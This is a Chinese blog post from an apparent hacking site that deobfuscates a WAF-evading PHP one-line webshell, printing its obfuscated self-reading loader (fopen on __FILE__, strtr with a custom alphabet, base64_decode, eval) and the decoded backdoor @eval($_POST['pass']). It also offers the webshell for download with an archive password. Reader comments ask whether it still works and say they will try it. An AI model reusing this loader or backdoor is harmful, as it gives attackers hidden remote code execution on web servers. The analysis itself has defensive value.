一款过waf的一句话木马分析

  • 内容
  • 相关

中午,下班回来,就看一个朋友给我发了几个马儿  让我看看解解密码  很简单

1.png2.png


猛不猛我不知道   那时候手机  太长的看着就烦   就回到家瞅瞅了

首先我们看这个马儿


4.png

一步步来,先分析前面的。前面的PHP代码部分有一个eval,我们改成echo试试

5.png

输出得到


$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};$OO0OO000O($O000O0O00,1136);$OO00O00O0=($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,380),'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($OO00O00O0);
替换进去得到


6.png

下来我们就要分析了


<?php
$OOO0O0O00=__FILE__;
//$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');

$OOO000000='th6sbehqla4co_sadfpnr';

$OO00O0000=248;

//$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
//$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
//$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
$OOO0000O0='base64_decode';

$O0O0000O0='OOO0000O0';

//$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};
$OO0OO0000='fopen';

//if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');
$O000O0O00=fopen($OOO0O0O00,'rb');

//$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
$OO0OO000O=='fread';

//$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};
$OO0OO00O0='strtr';

//$OO0OO000O($O000O0O00,1136);
fread($O000O0O00,1136);

/*$OO00O00O0=($OOO0000O0(
    $OO0OO00O0(
	            $OO0OO000O($O000O0O00,380),
				'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
				'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
				)
			)
);*/

$OO00O00O0=(base64_decode(
	strtr(
		$OO0OO000O($O000O0O00,380),
		'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
		'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
		)
	)
);


;eval($OO00O00O0);
return;
?>
分析后总结得到



$OOO0O0O00=__FILE__;//获取当前文件名
$O000O0O00=fopen($OOO0O0O00,'rb');//打开文件
fread($O000O0O00,248);//跳过248字节
$OO00O00O0=(base64_decode(
	strtr(
		fread($O000O0O00,380),
		'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
		'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
		)
	)
);//读取380字节,根据代码表替换字符,base64解码
eval($OO00O00O0);//执行解码后的代码
10.png



解得


@eval($_POST['pass']);//密码就等于pass

怎么解得卖个关子  不会的可以看看

管理员设置 回复 可见隐藏内容




  文件名稱:一句话木马

  更新時間:

  下載声明:密码: gadu

立即下載

下载链接

网盘下载

密码: gadu

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗未收录]

本文链接:一款过waf的一句话木马分析 - https://www.0dayhack.com/post-836.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

21条评论
  1. avatar

    sakula Lv.1 Chrome 64.0.3282.140 Chrome 64.0.3282.140 Windows Windows 回复

    学习

    浙江省杭州市 电信

    1. avatar

      wudi Lv.1 Sogou Explorer Sogou Explorer Windows Windows 回复

      厉害了,膜拜一下

      北京市 电信

      1. avatar

        wudi Lv.1 Sogou Explorer Sogou Explorer Windows Windows 回复

        学习一下,现在还能用吗,我去试一试....

        北京市 电信

        1. avatar

          wudi Lv.1 Sogou Explorer Sogou Explorer Windows Windows 回复

          学习一下,现在还能用吗,我去试一试

          北京市 电信

          1. avatar

            zz Lv.1 Chrome 67.0.3396.99 Chrome 67.0.3396.99 Windows Windows 回复

            学习学习

            加拿大

            1. avatar

              haizi Lv.1 Chrome 55.0.2883.87 Chrome 55.0.2883.87 Windows Windows 回复

              学习一下,现在还能用吗,我去试一试

              广东省广州市 电信

              1. avatar

                lpflpf960 Lv.1 Chrome 55.0.2883.87 Chrome 55.0.2883.87 Windows 7 x64 Edition Windows 7 x64 Edition 回复

                666666666666666666666666666666666

                北京市 移动

                1. avatar

                  wooluo0dayhack Lv.2 Chrome 67.0.3396.87 Chrome 67.0.3396.87 Mac OS X 10.13.2 Mac OS X 10.13.2 回复

                  6666666666666666厉害了

                  北京市 水利部

                  1. avatar

                    lz520520 Lv.1 Sogou Explorer Sogou Explorer Windows Windows 回复

                    6666666666666666厉害了

                    上海市 联通

                    1. avatar

                      流浪少年。 Lv.1 Chrome 53.0.2785.104 Chrome 53.0.2785.104 Windows Windows 回复

                      学习  学习

                      广东省中山市 移动